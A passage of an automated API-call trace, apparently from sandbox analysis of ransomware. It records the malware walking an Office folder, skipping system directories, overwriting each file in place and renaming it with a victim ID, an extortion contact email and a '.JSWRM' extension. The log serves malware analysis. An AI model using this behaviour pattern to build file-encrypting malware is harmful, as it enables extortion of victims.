lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0120.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.557] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR43F.GIF", cAlternateFileName="")) returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2=".") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="..") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="...") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="windows") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="recovery") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="perflogs") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="documents and settings") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="system volume information") returned 1 [0120.557] lstrcmpiW (lpString1="ZPDIR43F.GIF", lpString2="msocache") returned 1 [0120.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR43F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR43F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2455) returned 1 [0120.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x990) returned 0x20c6c0 [0120.558] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x990, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x990, lpOverlapped=0x0) returned 1 [0120.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.560] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x990, lpOverlapped=0x0) returned 1 [0120.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0120.560] CloseHandle (hObject=0x314) returned 1 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0120.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0120.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.560] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0120.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.561] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b06, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR44B.GIF", cAlternateFileName="")) returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2=".") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="..") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="...") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="windows") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="recovery") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="perflogs") returned 1 [0120.561] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="documents and settings") returned 1 [0120.562] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.562] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="system volume information") returned 1 [0120.562] lstrcmpiW (lpString1="ZPDIR44B.GIF", lpString2="msocache") returned 1 [0120.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR44B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR44B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6918) returned 1 [0120.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x24e1d8 [0120.563] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1b00, lpOverlapped=0x0) returned 1 [0120.565] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.565] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1b00, lpOverlapped=0x0) returned 1 [0120.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.565] CloseHandle (hObject=0x314) returned 1 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0120.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0120.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.566] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0120.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.566] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR44F.GIF", cAlternateFileName="")) returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2=".") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="..") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="...") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="windows") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="recovery") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="perflogs") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="documents and settings") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="system volume information") returned 1 [0120.567] lstrcmpiW (lpString1="ZPDIR44F.GIF", lpString2="msocache") returned 1 [0120.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR44F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR44F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR44F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.568] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6774) returned 1 [0120.568] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a70) returned 0x24e1d8 [0120.568] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1a70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1a70, lpOverlapped=0x0) returned 1 [0120.570] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.571] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1a70, lpOverlapped=0x0) returned 1 [0120.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.571] CloseHandle (hObject=0x314) returned 1 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0120.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.571] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 